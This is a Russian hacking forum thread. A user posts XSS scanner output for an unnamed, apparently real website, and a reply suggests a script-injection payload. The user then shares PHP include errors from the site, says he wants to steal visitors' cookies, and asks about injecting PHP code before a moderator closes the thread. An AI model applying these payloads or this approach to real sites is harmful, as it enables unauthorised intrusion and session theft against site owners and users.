Привет парни =)

Помогите мне разобратся с XSS плиз

Есть сайт ...... я его протестил прогой RPVS v1.3 она мне выдала XSS уязвимость типа:
xss vulnerability : /index.php?news=6941337<a>%22%27&id=1
xss vulnerability : /all_news.php?news=6941337<a>%22%27&id=1
xss vulnerability : /index.php?news=6941337<a>%22%27
bad http code 302 /ftp_prav.php?action=6941337<a>%22%27&submit1=Согласен
xss vulnerability : /ftp_prav.php?action=6941337<a>%22%27&submit1=Согласен
bad http code 302 /ftp_prav.php?action=6941337<a>%22%27&submit2=Не+согласен
xss vulnerability : /ftp_prav.php?action=6941337<a>%22%27&submit2=Не+согласен
bad http code 302 /ftp_prav.php?action=reg&submit1=6941337<a>%22%27
bad http code 302 /ftp_prav.php?action=intro&submit2=6941337<a>%22%27
xss vulnerability : /all_news.php?news=6941337<a>%22%27
xss vulnerability : /ftp.php?op=download&file=6941337<a>%22%27&location=/pub/Linux/source
xss vulnerability : /ftp.php?op=download&file=6941337<a>%22%27&location=/pub
xss vulnerability : /ftp.php?op=download&file=6941337<a>%22%27&location=/pub/Video/Приколы
xss vulnerability : /ftp.php?op=download&file=6941337<a>%22%27&location=/pub/Video/Parkour
Что это мне дает? что я могу с этим сделать?

пример:
первый линк, вместо 6941337<a>%22%27
пишешь "><script>alert(/css/)</script>

Что это мне дает? что я могу с этим сделать?
Читать тут:
http://hackzona.ru/hz.php?name=News&file=article&sid=5005
http://www.cgisecurity.com/articles/dx27.html
http://ha.ckers.org/xss.html
http://forum.antichat.ru/thread20140.html
http://forum.antichat.ru/thread8038.html
(с) Robin_Hood (faq)

пример:
первый линк, вместо 6941337<a>%22%27
пишешь "><script>alert(/css/)</script>

=) Да это мне уже понятно =)
Я уже использовал это
"><script>alert(/css/)</script>
но после этого он мне выдает следующее:
Warning: main(http://фылка на сайт/news/news\">.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /srv/www/sites/фылка на сайт/index.php on line 43
Warning: main(): Failed opening 'http://фылка на сайт/news/news\"><script>alert(/fuck/)</script>.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /srv/www/sites/фылка на сайт/index.php on line 43
Говорите скомуниздить куки? как это обычный сайт где нильзя оставлять сообшения =( так бы я в сообшение запихлул JS и куки спер =)
Может тут можно как например при Php including замутить произвольный php кода в страницу? или еще чтонить можно сделать?

Ссылки на материал по Xss тебе дали...читай на здоровье...
Закрыто...